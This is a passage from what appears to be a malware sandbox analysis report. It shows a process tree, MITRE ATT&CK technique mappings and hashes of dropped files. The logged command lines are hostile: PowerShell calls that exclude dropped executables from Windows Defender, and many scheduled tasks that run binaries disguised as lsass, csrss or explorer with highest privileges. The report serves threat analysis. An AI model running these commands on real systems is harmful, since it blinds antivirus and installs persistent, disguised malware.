        Drops file in Program Files directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2892
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\DllCommonsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3056
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:944
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\DllCommonsvc.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:624
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\taskhost.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\providercommon\System.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1044
        
        C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe
        
        "C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe"
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1104
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\bf2k7CZMYL.bat"
        8⤵
        
        PID:1460
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:1800
        
        C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe
        
        "C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe"
        9⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2328
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\tGPC7CVf0d.bat"
        10⤵
        
        PID:2000
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        11⤵
        
        PID:456
        
        C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe
        
        "C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe"
        11⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:524
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cU7BGbiaqd.bat"
        12⤵
        
        PID:2984
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        13⤵
        
        PID:1424
        
        C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe
        
        "C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe"
        13⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2540
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7FnFm4j3ls.bat"
        14⤵
        
        PID:736
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        15⤵
        
        PID:1628
        
        C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe
        
        "C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe"
        15⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\WtKWrLEt72.bat"
        16⤵
        
        PID:2096
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        17⤵
        
        PID:2692
        
        C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe
        
        "C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe"
        17⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3000
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\5EJ4eIa89C.bat"
        18⤵
        
        PID:2988
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        19⤵
        
        PID:2192
        
        C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe
        
        "C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe"
        19⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2880
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\DJG58brWjr.bat"
        20⤵
        
        PID:1100
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        21⤵
        
        PID:2564
        
        C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe
        
        "C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe"
        21⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:920

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\providercommon\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2892

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2788

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 7 /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 14 /tr "'C:\Windows\Setup\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Windows\Setup\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2576

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Windows\Setup\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1636

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2412

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Photo Viewer\it-IT\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\providercommon\sppsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1612

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvc" /sc ONLOGON /tr "'C:\providercommon\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sppsvcs" /sc MINUTE /mo 9 /tr "'C:\providercommon\sppsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:896

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 11 /tr "'C:\Users\Default\Local Settings\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Users\Default\Local Settings\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2684

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Users\Default\Local Settings\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2292

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 13 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2880

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\MSOCache\All Users\{90140000-0016-0409-0000-0000000FF1CE}-C\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1208

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 5 /tr "'C:\Program Files\Windows Media Player\fr-FR\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1596

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Program Files\Windows Media Player\fr-FR\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:624

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Media Player\fr-FR\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\lsass.exe'" /f
1⤵
- Process spawned unexpected child process
PID:1600

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\lsass.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2224

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 12 /tr "'C:\Program Files\Microsoft Office\Office14\1033\OSPPSVC.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2432

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVC" /sc ONLOGON /tr "'C:\Program Files\Microsoft Office\Office14\1033\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2236

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OSPPSVCO" /sc MINUTE /mo 13 /tr "'C:\Program Files\Microsoft Office\Office14\1033\OSPPSVC.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 10 /tr "'C:\Windows\Vss\Writers\System\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\Vss\Writers\System\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 5 /tr "'C:\Windows\Vss\Writers\System\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:532

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Users\Admin\Links\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Users\Admin\Links\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1800

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Links\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:672

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 8 /tr "'C:\Windows\PLA\Reports\en-US\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2452

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\PLA\Reports\en-US\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1500

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Windows\PLA\Reports\en-US\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 6 /tr "'C:\providercommon\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
PID:2848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1656

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\providercommon\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3040

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 10 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\smss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1948

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "smsss" /sc MINUTE /mo 11 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\smss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2668

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\System.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2584

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2244

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\System.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1408

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 7 /tr "'C:\Users\Default User\conhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:868

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 10 /tr "'C:\Users\Default User\conhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:824

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1644

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 9 /tr "'C:\Program Files\Uninstall Information\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:2716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 13 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\cmd.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmd" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:740

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "cmdc" /sc MINUTE /mo 10 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\cmd.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3004

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2724

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2052

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2748

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
PID:1216

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 13 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\DllCommonsvc.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvc" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1960

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "DllCommonsvcD" /sc MINUTE /mo 8 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\DllCommonsvc.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1696

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\taskhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2712

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhost" /sc ONLOGON /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\taskhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1560

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "taskhostt" /sc MINUTE /mo 6 /tr "'C:\Recovery\31f19e42-8726-11ef-be9a-dab21757c799\taskhost.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 10 /tr "'C:\providercommon\System.exe'" /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:2796

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "System" /sc ONLOGON /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1812

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SystemS" /sc MINUTE /mo 9 /tr "'C:\providercommon\System.exe'" /rl HIGHEST /f
1⤵
- Scheduled Task/Job: Scheduled Task
PID:1892

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
00dbe312b455527b174e81905335bd8d

SHA1
f28cc9127d262e4d04deb2adb10438c6c43ef677

SHA256
ebc7b0127e7f1d43e555b61c6040f26708fbb0c12c75a8c05b224f83868606e1

SHA512
8b5ec2ae9da0624945c3def946a8077a16b6c638caa5c5836c6970f3423ff662feda6bdab70719c8cc1c191143d17eacfe466041dfbbe3d06a04a8697b6d7845

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
84a38b8b0109e9abe8de97198613578f

SHA1
6fe43fe7f60cf00f6a4bb2caba552535eb93fc57

SHA256
21d5d9098dd26b9e8a59312499565e2feb376a93f590805fab02a83355e188e9

SHA512
960d52f65c2fed44d1861c37733b01190fa1c55b9c04ffcd19a2ef390f059e671a0333365c56931ba8be8e9bac529dd604b41d97cd1eeca021cc770d5d3bc04e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
6f219e630652157308f75dc4b88663c5

SHA1
4ca80264e83d24f0a5923483c85768f6820541ac

SHA256
1926441b2bf38b5bb68ee6d90198d05d15f54da711dc76e51be639dc26cbfc05

SHA512
0decc4fcca142704af3673b50864cb3b6cd0210e43269d5e011ef970ead5c2abf33d9fe0c19922bbd5c4a58b657d9b112a9902534fa83e6feb55bfb5464ce3f6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
31fa7ca4347a68c90a750341ed662859

SHA1
2777ebafb82ef0bc308b4bab757259bbe7960986

SHA256
e34fba3f9795a14b4c0c353b50c3f4fed78baeff7631cc24b47120987e33fe61

SHA512
131edad6c99ecd1082e2eee976a4b01a8a7114238ccc8bf51a6915c19009707a544339fdd91b641a22fba5a82b7d67f59b8f7661e6ab903387c75f6e43687661

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ac338def37a8b5dd5fdb6214fffe53a8

SHA1
bdd55309010a9c1c41c3506e5cf587027aa70145

SHA256
4939ec0a63ae6647f39e92a76c307b0b11314628d07f35c80e0057b196ca8345

SHA512
1e77cd0e2478e7f894f3adb9f42fe792524b6c2c7fc8cc02fa8ed48aed68844e447e897e1c5cf7d7476c1445b61d6377cd9c4160e19873d7d88836d83f42ba2b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
f353e7c128af2ec25b4401de528b2a6a

SHA1
64a53ce58a3917f070d036081f10f711d2e59d54

SHA256
29875938a25bf8f339c7ec53ce1bcf0a0701bae6d3702530f1d523c1edc130e5

SHA512
e62300e931e4fa5cf558a8184c9939712a39937a80123e523a4b77c0b9dd609ad91cf70c9254ab1130642edbd6582ac85035208eb9bde5d2af0efabe1fef9efb

Download Submit
C:\Users\Admin\AppData\Local\Temp\5EJ4eIa89C.bat

Filesize
226B

MD5
8d5657e211f948f376dd2df0858d9d15

SHA1
a09eca4590b5b28d6b14b9dab37f36440576f44b

SHA256
df8018fa1d16d862c5f51e654a76afba4a89b7ae8524fac2f9115d5d60918b15

SHA512
8b1240ca6de629131e84a4e84f1345ae39c26679749674164023a6ac0e7805a0aa947f338e6063308ad80c103b2b66c34f148921e7f5efc726ccc8d934eabef6

Download Submit
C:\Users\Admin\AppData\Local\Temp\7FnFm4j3ls.bat

Filesize
226B

MD5
4c5e489dfa7f9cf791d2555649d4e04d

SHA1
449301e65ed76b2442befea65eab976547cefdb4

SHA256
